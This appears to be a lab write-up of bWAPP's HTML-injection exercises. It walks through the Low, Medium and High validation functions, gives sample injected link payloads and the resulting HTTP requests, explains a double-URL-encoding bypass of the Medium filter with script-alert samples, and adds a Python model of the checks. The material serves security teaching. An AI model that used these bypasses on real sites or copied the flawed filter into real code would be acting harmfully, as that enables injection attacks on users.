Stored XSS
Reflective XSS
DOM-based XSS
Server XSS
Client XSS
Security Level Low
// Input Validation
function no_check($data) {
    return $data;
}
Attack
Because there is no input validation in place, injection is easily done. E.g., if we enter the following values:
firstname: <a href="http://www.google.com"><h1>Click Me</h1></a>
lastname : Security Level: Low
the resulting HTTP-Request (GET Method) is:
GET /bWAPP/htmli_get.php?firstname=<a+href%3D"http%3A%2F%2Fwww.google.com"><h1>Click+Me<%2Fh1><%2Fa>&lastname=Security+Level%3A+Low&form=submit HTTP/1.0
the resulting HTTP-Request (POST Method) is:
POST /bWAPP/htmli_post.php HTTP/1.0
Content-Length: 138
Content-Type: application/x-www-form-urlencoded
firstname=%3Ca+href%3D%22http%3A%2F%2Fwww.google.com%22%3E%3Ch1%3EClick+Me%3C%2Fh1%3E%3C%2Fa%3E&lastname=Security+Level%3A+Low&form=submit
Security Level Low: no_check($data)
vulnerable: no input validation
Security Level Medium
// Input Validation
function xss_check_1($data) {
    // Converts only "<" and ">" to HTML entities
    $input = str_replace("<", "&lt;", $data);
    $input = str_replace(">", "&gt;", $input);
    // Failure is an option
    // Bypasses double encoding attacks
    // <script>alert(0)</script>
    // %3Cscript%3Ealert%280%29%3C%2Fscript%3E
    // %253Cscript%253Ealert%25280%2529%253C%252Fscript%253E
    $input = urldecode($input);
    return $input;
}
Attack
The input validation does not protect against double URL-encoded input data. E.g., if we enter the following values:
firstname: %3Ca+href="http://www.google.com"%3E%3Ch1%3EClick+Me%3C/h1%3E%3C/a%3E
lastname : Security Level: Medium
the resulting HTTP-Request (GET Method) is:
GET /bWAPP/htmli_get.php?firstname=%253Ca%2Bhref%3D"http%3A%2F%2Fwww.google.com"%253E%253Ch1%253EClick%2BMe%253C%2Fh1%253E%253C%2Fa%253E&lastname=Security+Level%3A+Medium&form=submit HTTP/1.0
the resulting HTTP-Request (POST Method) is:
POST /bWAPP/htmli_post.php HTTP/1.0
Content-Length: 161
Content-Type: application/x-www-form-urlencoded
firstname=%253Ca%2Bhref%3D%22http%3A%2F%2Fwww.google.com%22%253E%253Ch1%253EClick%2BMe%253C%2Fh1%253E%253C%2Fa%253E&lastname=Security+Level%3A+Medium&form=submit
Security Level Medium: xss_check_1($data)
vulnerable: insufficient input validation
urldecode() is applied to data that PHP has already URL-decoded ($_GET), so double URL-encoded input passes the "<" / ">" check and is only turned into markup afterwards
Security Level High
// Input Validation
function xss_check_3($data, $encoding = "UTF-8") {
    // htmlspecialchars - converts special characters to HTML entities
    // '&' (ampersand) becomes '&amp;'
    // '"' (double quote) becomes '&quot;' when ENT_NOQUOTES is not set
    // "'" (single quote) becomes '&#039;' (or '&apos;') only when ENT_QUOTES is set
    // '<' (less than) becomes '&lt;'
    // '>' (greater than) becomes '&gt;'
    return htmlspecialchars($data, ENT_QUOTES, $encoding);
}
Attack
At the moment there is no known way to circumvent this input validation, provided the output is used in the right context.
Security Level High: xss_check_3($data)
no known vulnerability if used in the right context
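The three levels modelled in Python and run against the two firstname values from the requests above, as an added illustration that is not part of the bWAPP source or of this writeup. php_request_decode, markup_survives and evaluate are helper names chosen here; the sample values are the parameter strings copied from the Low and Medium POST bodies.

```python
from html import escape
from urllib.parse import unquote_plus

# Constructed samples: the firstname parameter exactly as the browser sent it in
# the Low-level (single URL-encoded) and Medium-level (double URL-encoded) POST requests.
SINGLE_ENCODED_FIRSTNAME = (
    "%3Ca+href%3D%22http%3A%2F%2Fwww.google.com%22%3E"
    "%3Ch1%3EClick+Me%3C%2Fh1%3E%3C%2Fa%3E"
)
DOUBLE_ENCODED_FIRSTNAME = (
    "%253Ca%2Bhref%3D%22http%3A%2F%2Fwww.google.com%22%253E"
    "%253Ch1%253EClick%2BMe%253C%2Fh1%253E%253C%2Fa%253E"
)


def php_request_decode(raw: str) -> str:
    """One round of URL decoding, as PHP does when it populates $_GET / $_POST."""
    return unquote_plus(raw)


def no_check(data: str) -> str:
    """Security Level Low: the value is returned untouched."""
    return data


def xss_check_1(data: str) -> str:
    """Security Level Medium: escape < and >, then urldecode() the result.
    The decode runs after the escape, so %3C / %3E pass the check untouched
    and only then become < and >."""
    escaped = data.replace("<", "&lt;").replace(">", "&gt;")
    return unquote_plus(escaped)  # PHP urldecode() also turns '+' into a space


def xss_check_3(data: str) -> str:
    """Security Level High: htmlspecialchars($data, ENT_QUOTES, "UTF-8").
    html.escape encodes the same five characters (it emits &#x27; for the
    single quote where PHP emits &#039;)."""
    return escape(data, quote=True)


def markup_survives(check, raw_param: str) -> bool:
    """True if a raw < or > is still present after the server decodes the
    parameter and the given check runs, i.e. the browser would see a tag."""
    rendered = check(php_request_decode(raw_param))
    return "<" in rendered or ">" in rendered


def evaluate(raw_param: str) -> dict:
    """Run one request value through all three levels."""
    return {
        "low": markup_survives(no_check, raw_param),
        "medium": markup_survives(xss_check_1, raw_param),
        "high": markup_survives(xss_check_3, raw_param),
    }
```

Note that the double-encoded value only works against the Medium level: at Low it is displayed as literal %3C text, and at High neither value survives because htmlspecialchars runs without a decode step after it.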
Security Level Low
GET /bWAPP/iframei.php?ParamUrl=https://www.bing.com&ParamWidth=250&ParamHeight=250 HTTP/1.0